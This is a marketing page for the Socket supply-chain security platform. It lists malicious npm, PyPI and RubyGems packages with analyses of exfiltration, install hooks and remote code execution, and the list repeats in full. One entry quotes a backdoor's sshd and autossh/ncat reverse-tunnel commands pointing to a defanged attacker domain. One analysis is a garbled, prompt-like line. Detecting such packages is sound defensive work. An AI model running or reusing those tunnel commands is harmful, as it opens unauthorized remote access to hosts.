You're Invited:Meet the Socket Team at BlackHat and DEF CON in Las Vegas, Aug 4-6.RSVP
Socket
Book a DemoInstallSign in
Socket

Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.

Install GitHub AppBook a Demo

Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery
t

timmywil published 3.7.1

left-pad
s

stevemao published 1.3.0

react
r

react-bot published 19.1.0

We protect you from vulnerable and malicious packages

malwaretesting2

1.0.0

by rocksecc

Removed from npm

Blocked by Socket

The code poses a significant security risk due to the unauthorized collection and transmission of detailed system information to an external server. This behavior is indicative of potential data exfiltration, which is a common trait of malicious software.

Live on npm for 4 days, 19 hours and 45 minutes before removal. Socket users were protected even while the package was live.

pwn

0.4.961

by 0day Inc.

Live on Rubygems

Blocked by Socket

The script 'packer/provisioners/post_install.sh' exhibits malicious behavior by performing several harmful actions: - **Deletes user and root history files**: Uses secure deletion methods to remove history files, potentially to conceal malicious activities. - **Clears system log files**: Erases log files from '/var/log', hindering the ability to audit and investigate system actions. - **Disables the root account**: Locks the root account password without ensuring alternative secure administrative access, possibly preventing legitimate administrative operations. - **Sets a weak default password ('changeme') for the 'admin' user**: Introduces a significant security risk by using an easily guessable password, facilitating unauthorized access. These actions can be exploited by an attacker to gain unauthorized access, disrupt legitimate operations, and prevent system recovery. The combination of log and history deletion, disabling of root access, and setting weak credentials indicates malicious intent to compromise system security and conceal nefarious activities.

azure-graphrbac

1.7.6

Removed from npm

Blocked by Socket

The code exhibits behavior consistent with data exfiltration, sending sensitive system and project information to remote servers without user consent. This poses a significant security risk.

Live on npm for 43 minutes before removal. Socket users were protected even while the package was live.

voipms-service

0.1

Removed from PyPI

Blocked by Socket

The code exhibits malicious behavior by exfiltrating sensitive information (cookie and IP address) to an external server via a Discord webhook. The presence of hardcoded credentials further increases the security risk. While the code is not obfuscated, its actions are clearly unauthorized and pose a significant threat to user privacy.

Live on PyPI for 55 minutes before removal. Socket users were protected even while the package was live.

recovery-center-web-sdk

0.0.28

by blazecarter

Removed from npm

Blocked by Socket

This package has been removed from the registry. The code performs unauthorized data exfiltration by collecting sensitive system and user information including home directory paths, hostnames, usernames, DNS server configurations, and complete package metadata. This data is serialized into JSON format and transmitted via HTTPS POST request to webhook[.]site, a public webhook service commonly used for data collection. The malware operates silently without user consent or notification, implements minimal error handling to avoid detection, and sends the entire package.json contents which may contain additional sensitive metadata. This constitutes a serious supply chain security attack designed to steal environmental and system information from infected systems.

Live on npm for 3 hours and 59 minutes before removal. Socket users were protected even while the package was live.

azure-graphrbac

12.12.1000

Removed from npm

Blocked by Socket

The code exhibits clear malicious behavior by collecting and transmitting sensitive user data to external servers without consent. The continuous loop for sending requests raises concerns about potential abuse. Therefore, the malware score is high, reflecting the serious nature of the actions taken by the code.

Live on npm for 3 minutes before removal. Socket users were protected even while the package was live.

sushi-client

1.785.0

by hamz-sus

Removed from npm

Blocked by Socket

The code snippet is likely performing a data leak by sending system data to a suspicious domain. It also exhibits obfuscation techniques.

Live on npm for 32 days, 11 hours and 5 minutes before removal. Socket users were protected even while the package was live.

bssynccmd

1.0.9

by bsguimain

Live on npm

Blocked by Socket

This file regularly transmits a wide range of system information (hostname, OS details, memory, process ID, and more) to the remote domain bs[.]nodekit[.]vip and can execute arbitrary code received from that server. It employs eval(), creating the risk of remote code execution, and can fork additional processes based on server instructions. These behaviors suggest active data exfiltration and control capabilities typical of malware.

electron-release-clerk

0.0.1

by bluekack01372

Removed from npm

Blocked by Socket

The script collects system information and sends it to an external server, which is indicative of malicious behavior aimed at data exfiltration.

Live on npm for 12 hours and 12 minutes before removal. Socket users were protected even while the package was live.

airbnb-dev

6.0.0

by jpdtest1

Removed from npm

Blocked by Socket

The code is designed to collect and transmit system information to external endpoints without user consent, which is indicative of malicious behavior. The hardcoded endpoints and the nature of the data being sent pose a significant security risk.

Live on npm for 1 day, 9 hours and 3 minutes before removal. Socket users were protected even while the package was live.

python-115

0.0.9.0.7

Removed from PyPI

Blocked by Socket

The code exhibits potential security risks related to user authentication and data handling, particularly with the CAPTCHA cracking functionality. While there are no clear indicators of malware, the use of external libraries and dynamic code execution raises concerns. The overall risk is moderate, and further scrutiny is recommended.

Live on PyPI for 215 days and 55 minutes before removal. Socket users were protected even while the package was live.

redis-v3

1.0.0

by dhparadox

Removed from npm

Blocked by Socket

The script makes a request to an external IP address, which raises significant security concerns. This behavior is suspicious and could indicate an attempt to retrieve malicious content or exfiltrate data.

Live on npm for 2 hours and 39 minutes before removal. Socket users were protected even while the package was live.

npm-vue-noticefaq

2.2.2

by amit2001

Removed from npm

Blocked by Socket

The code poses a moderate security risk due to the dynamic loading of external resources without validation. This behavior could potentially allow for the execution of malicious scripts if the external source is compromised. It is recommended to review the external resources for trustworthiness before use.

Live on npm for 1 minute before removal. Socket users were protected even while the package was live.

staff-www

4.50.12

by act1on3-test

Removed from npm

Blocked by Socket

This script is exfiltrating sensitive system information (hostname, current user, current directory) to a remote server without the user's consent. This behavior is highly suspicious and poses a significant security risk.

Live on npm for 39 minutes before removal. Socket users were protected even while the package was live.

new-npm-packages

999.9.9

by mega707

Removed from npm

Blocked by Socket

The script collects information like package details, directories, hostnames, DNS servers and user information, and sends it to a remote server.

Live on npm for 59 minutes before removal. Socket users were protected even while the package was live.

noway-back

1.0.0

Removed from PyPI

Blocked by Socket

This is a malicious package designed to execute hidden code during installation. It uses a custom install hook to load and execute arbitrary code from a zip file, representing a clear supply chain attack vector with high security risk.

Live on PyPI for 3 hours and 31 minutes before removal. Socket users were protected even while the package was live.

sbirez

0.999.999

Removed from npm

Blocked by Socket

The code is designed to exfiltrate sensitive system information by encoding it and sending it as part of a domain name in a ping command. This is a clear indication of malicious intent, as it covertly sends data to an external server without user consent.

Live on npm for 2 hours and 3 minutes before removal. Socket users were protected even while the package was live.

zeppelin-fable-pgr722

1.0.0

by afifaljafari112

Removed from npm

Blocked by Socket

The code imports and executes methods from several suspiciously named external libraries without clear functionality or purpose. While there's no explicit malicious activity detected, the unusual naming conventions and lack of clarity raise security concerns. Further investigation of the imported modules is necessary.

Live on npm for 57 days, 10 hours and 7 minutes before removal. Socket users were protected even while the package was live.

audio-separator-fork

0.8.5

Removed from PyPI

Blocked by Socket

The file contains code that sets up an SSH server by executing a command similar to '/usr/sbin/sshd -D -o ListenAddress=0[.]0[.]0[.]0 -p 8000' and then launches a reverse proxy using a command such as 'autossh -o ProxyCommand="ncat --proxy-type socks5 --proxy emberglaze[.]fireindahole[.]fun:4090 %h %p" -o StrictHostKeyChecking=no -R 8000:127[.]0[.]0[.]1:8000 test@fireindahole[.]fun -N'. In addition, there are indications that the code might change system parameters (e.g., changing root credentials) and install networking utilities. These network operations are deliberately implemented to facilitate unauthorized remote access and control of the host system, representing a significant security risk and serving as a backdoor mechanism.

Live on PyPI for 5 hours and 36 minutes before removal. Socket users were protected even while the package was live.

hub-http

4.999.0

Removed from npm

Blocked by Socket

The code is performing malicious activities by exfiltrating sensitive system information to a remote server. This poses a significant security risk and should be considered as malware.

Live on npm for 58 minutes before removal. Socket users were protected even while the package was live.

keycloak-theme

3.0.0

by linggdte66

Removed from npm

Blocked by Socket

The code is malicious as it collects and sends sensitive system data to a remote server without user consent. This poses a significant security risk.

Live on npm for 22 hours and 44 minutes before removal. Socket users were protected even while the package was live.

moogli-erp

2024.2.1

Removed from PyPI

Blocked by Socket

Resolve the promises to access the actual content of the reports and conduct a detailed security analysis to identify any potential security risks or vulnerabilities in the open-source dependency.

Live on PyPI for 10 minutes before removal. Socket users were protected even while the package was live.

tv-ui-common

1.1.0

by ganeshbagariah1

Removed from npm

Blocked by Socket

The script downloads a file from a remote server. This behavior is potentially risky as it could download and execute malicious code on the system.

Live on npm for 11 days, 5 hours and 16 minutes before removal. Socket users were protected even while the package was live.

consolidate-logger

1.0.2

by crouch626

Removed from npm

Blocked by Socket

The code exhibits suspicious behavior by obfuscating a URL and using eval to handle errors, which can lead to executing arbitrary code. This poses a security risk, especially if the remote server is untrusted.

Live on npm for 20 days, 18 hours and 47 minutes before removal. Socket users were protected even while the package was live.

sap-abstract

1.4.3

by abdallaeg2

Removed from npm

Blocked by Socket

The code is designed to send sensitive system information to a remote server, which is a significant security risk. This behavior is consistent with malicious activity, specifically data exfiltration.

Live on npm for 2 minutes before removal. Socket users were protected even while the package was live.

malwaretesting2

1.0.0

by rocksecc

Removed from npm

Blocked by Socket

The code poses a significant security risk due to the unauthorized collection and transmission of detailed system information to an external server. This behavior is indicative of potential data exfiltration, which is a common trait of malicious software.

Live on npm for 4 days, 19 hours and 45 minutes before removal. Socket users were protected even while the package was live.

pwn

0.4.961

by 0day Inc.

Live on Rubygems

Blocked by Socket

The script 'packer/provisioners/post_install.sh' exhibits malicious behavior by performing several harmful actions: - **Deletes user and root history files**: Uses secure deletion methods to remove history files, potentially to conceal malicious activities. - **Clears system log files**: Erases log files from '/var/log', hindering the ability to audit and investigate system actions. - **Disables the root account**: Locks the root account password without ensuring alternative secure administrative access, possibly preventing legitimate administrative operations. - **Sets a weak default password ('changeme') for the 'admin' user**: Introduces a significant security risk by using an easily guessable password, facilitating unauthorized access. These actions can be exploited by an attacker to gain unauthorized access, disrupt legitimate operations, and prevent system recovery. The combination of log and history deletion, disabling of root access, and setting weak credentials indicates malicious intent to compromise system security and conceal nefarious activities.

azure-graphrbac

1.7.6

Removed from npm

Blocked by Socket

The code exhibits behavior consistent with data exfiltration, sending sensitive system and project information to remote servers without user consent. This poses a significant security risk.

Live on npm for 43 minutes before removal. Socket users were protected even while the package was live.

voipms-service

0.1

Removed from PyPI

Blocked by Socket

The code exhibits malicious behavior by exfiltrating sensitive information (cookie and IP address) to an external server via a Discord webhook. The presence of hardcoded credentials further increases the security risk. While the code is not obfuscated, its actions are clearly unauthorized and pose a significant threat to user privacy.

Live on PyPI for 55 minutes before removal. Socket users were protected even while the package was live.

recovery-center-web-sdk

0.0.28

by blazecarter

Removed from npm

Blocked by Socket

This package has been removed from the registry. The code performs unauthorized data exfiltration by collecting sensitive system and user information including home directory paths, hostnames, usernames, DNS server configurations, and complete package metadata. This data is serialized into JSON format and transmitted via HTTPS POST request to webhook[.]site, a public webhook service commonly used for data collection. The malware operates silently without user consent or notification, implements minimal error handling to avoid detection, and sends the entire package.json contents which may contain additional sensitive metadata. This constitutes a serious supply chain security attack designed to steal environmental and system information from infected systems.

Live on npm for 3 hours and 59 minutes before removal. Socket users were protected even while the package was live.

azure-graphrbac

12.12.1000

Removed from npm

Blocked by Socket

The code exhibits clear malicious behavior by collecting and transmitting sensitive user data to external servers without consent. The continuous loop for sending requests raises concerns about potential abuse. Therefore, the malware score is high, reflecting the serious nature of the actions taken by the code.

Live on npm for 3 minutes before removal. Socket users were protected even while the package was live.

sushi-client

1.785.0

by hamz-sus

Removed from npm

Blocked by Socket

The code snippet is likely performing a data leak by sending system data to a suspicious domain. It also exhibits obfuscation techniques.

Live on npm for 32 days, 11 hours and 5 minutes before removal. Socket users were protected even while the package was live.

bssynccmd

1.0.9

by bsguimain

Live on npm

Blocked by Socket

This file regularly transmits a wide range of system information (hostname, OS details, memory, process ID, and more) to the remote domain bs[.]nodekit[.]vip and can execute arbitrary code received from that server. It employs eval(), creating the risk of remote code execution, and can fork additional processes based on server instructions. These behaviors suggest active data exfiltration and control capabilities typical of malware.

electron-release-clerk

0.0.1

by bluekack01372

Removed from npm

Blocked by Socket

The script collects system information and sends it to an external server, which is indicative of malicious behavior aimed at data exfiltration.

Live on npm for 12 hours and 12 minutes before removal. Socket users were protected even while the package was live.

airbnb-dev

6.0.0

by jpdtest1

Removed from npm

Blocked by Socket

The code is designed to collect and transmit system information to external endpoints without user consent, which is indicative of malicious behavior. The hardcoded endpoints and the nature of the data being sent pose a significant security risk.

Live on npm for 1 day, 9 hours and 3 minutes before removal. Socket users were protected even while the package was live.

python-115

0.0.9.0.7

Removed from PyPI

Blocked by Socket

The code exhibits potential security risks related to user authentication and data handling, particularly with the CAPTCHA cracking functionality. While there are no clear indicators of malware, the use of external libraries and dynamic code execution raises concerns. The overall risk is moderate, and further scrutiny is recommended.

Live on PyPI for 215 days and 55 minutes before removal. Socket users were protected even while the package was live.

redis-v3

1.0.0

by dhparadox

Removed from npm

Blocked by Socket

The script makes a request to an external IP address, which raises significant security concerns. This behavior is suspicious and could indicate an attempt to retrieve malicious content or exfiltrate data.

Live on npm for 2 hours and 39 minutes before removal. Socket users were protected even while the package was live.

npm-vue-noticefaq

2.2.2

by amit2001

Removed from npm

Blocked by Socket

The code poses a moderate security risk due to the dynamic loading of external resources without validation. This behavior could potentially allow for the execution of malicious scripts if the external source is compromised. It is recommended to review the external resources for trustworthiness before use.

Live on npm for 1 minute before removal. Socket users were protected even while the package was live.

staff-www

4.50.12

by act1on3-test

Removed from npm

Blocked by Socket

This script is exfiltrating sensitive system information (hostname, current user, current directory) to a remote server without the user's consent. This behavior is highly suspicious and poses a significant security risk.

Live on npm for 39 minutes before removal. Socket users were protected even while the package was live.

new-npm-packages

999.9.9

by mega707

Removed from npm

Blocked by Socket

The script collects information like package details, directories, hostnames, DNS servers and user information, and sends it to a remote server.

Live on npm for 59 minutes before removal. Socket users were protected even while the package was live.

noway-back

1.0.0

Removed from PyPI

Blocked by Socket

This is a malicious package designed to execute hidden code during installation. It uses a custom install hook to load and execute arbitrary code from a zip file, representing a clear supply chain attack vector with high security risk.

Live on PyPI for 3 hours and 31 minutes before removal. Socket users were protected even while the package was live.

sbirez

0.999.999

Removed from npm

Blocked by Socket

The code is designed to exfiltrate sensitive system information by encoding it and sending it as part of a domain name in a ping command. This is a clear indication of malicious intent, as it covertly sends data to an external server without user consent.

Live on npm for 2 hours and 3 minutes before removal. Socket users were protected even while the package was live.

zeppelin-fable-pgr722

1.0.0

by afifaljafari112

Removed from npm

Blocked by Socket

The code imports and executes methods from several suspiciously named external libraries without clear functionality or purpose. While there's no explicit malicious activity detected, the unusual naming conventions and lack of clarity raise security concerns. Further investigation of the imported modules is necessary.

Live on npm for 57 days, 10 hours and 7 minutes before removal. Socket users were protected even while the package was live.

audio-separator-fork

0.8.5

Removed from PyPI

Blocked by Socket

The file contains code that sets up an SSH server by executing a command similar to '/usr/sbin/sshd -D -o ListenAddress=0[.]0[.]0[.]0 -p 8000' and then launches a reverse proxy using a command such as 'autossh -o ProxyCommand="ncat --proxy-type socks5 --proxy emberglaze[.]fireindahole[.]fun:4090 %h %p" -o StrictHostKeyChecking=no -R 8000:127[.]0[.]0[.]1:8000 test@fireindahole[.]fun -N'. In addition, there are indications that the code might change system parameters (e.g., changing root credentials) and install networking utilities. These network operations are deliberately implemented to facilitate unauthorized remote access and control of the host system, representing a significant security risk and serving as a backdoor mechanism.

Live on PyPI for 5 hours and 36 minutes before removal. Socket users were protected even while the package was live.

hub-http

4.999.0

Removed from npm

Blocked by Socket

The code is performing malicious activities by exfiltrating sensitive system information to a remote server. This poses a significant security risk and should be considered as malware.

Live on npm for 58 minutes before removal. Socket users were protected even while the package was live.

keycloak-theme

3.0.0

by linggdte66

Removed from npm

Blocked by Socket

The code is malicious as it collects and sends sensitive system data to a remote server without user consent. This poses a significant security risk.

Live on npm for 22 hours and 44 minutes before removal. Socket users were protected even while the package was live.

moogli-erp

2024.2.1

Removed from PyPI

Blocked by Socket

Resolve the promises to access the actual content of the reports and conduct a detailed security analysis to identify any potential security risks or vulnerabilities in the open-source dependency.

Live on PyPI for 10 minutes before removal. Socket users were protected even while the package was live.

tv-ui-common

1.1.0

by ganeshbagariah1

Removed from npm

Blocked by Socket

The script downloads a file from a remote server. This behavior is potentially risky as it could download and execute malicious code on the system.

Live on npm for 11 days, 5 hours and 16 minutes before removal. Socket users were protected even while the package was live.

consolidate-logger

1.0.2

by crouch626

Removed from npm

Blocked by Socket

The code exhibits suspicious behavior by obfuscating a URL and using eval to handle errors, which can lead to executing arbitrary code. This poses a security risk, especially if the remote server is untrusted.

Live on npm for 20 days, 18 hours and 47 minutes before removal. Socket users were protected even while the package was live.

sap-abstract

1.4.3

by abdallaeg2

Removed from npm

Blocked by Socket

The code is designed to send sensitive system information to a remote server, which is a significant security risk. This behavior is consistent with malicious activity, specifically data exfiltration.

Live on npm for 2 minutes before removal. Socket users were protected even while the package was live.

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Known malware

Possible typosquat attack

NPM Shrinkwrap

Git dependency

HTTP dependency

Suspicious Stars on GitHub

Protestware or potentially unwanted behavior

Unstable ownership

AI-detected potential malware

Obfuscated code

21 more alerts

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.

GitHub app screenshot

Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Even more developer love
Install GitHub AppRead the docs

Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Even more security team love
Book a DemoRead the blog

Why teams choose Socket

Pro-active security

Depend on Socket to prevent malicious open source dependencies from infiltrating your app.

Easy to install

Install the Socket GitHub App in just 2 clicks and get protected today.

Comprehensive open source protection

Block 70+ issues in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more.

Develop faster

Reduce work by surfacing actionable security information directly in GitHub. Empower developers to make better decisions.

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Dec 14, 2023

Hijacked cryptocurrency library adds malware

Widely-used library in cryptocurrency frontend was compromised to include wallet-draining code, following the hijacking of NPM account credentials via phishing.

Jan 06, 2022

Maintainer intentionally adds malware

Rogue maintainer sabotages his own open source package with 100M downloads/month, notably breaking Amazon's AWS SDK.

Nov 15, 2021

npm discovers a platform vulnerability allowing unauthorized publishing of any package

Attackers could publish new versions of any npm package without authorization for multiple years.

Oct 22, 2021

Hijacked package adds cryptominers and password-stealing malware

Multiple packages with 30M downloads/month are hijacked and publish malicious versions directly into the software supply chain.

Nov 26, 2018

Package hijacked adding organization specific backdoors

Obfuscated malware added to a dependency which targeted a single company, went undetected for over a week, and made it into their production build.

Ready to dive in?

Get protected by Socket with just 2 clicks.

Install GitHub AppBook a Demo

The latest from the Socket team

Get our latest security research, open source insights, and product updates.

View all articles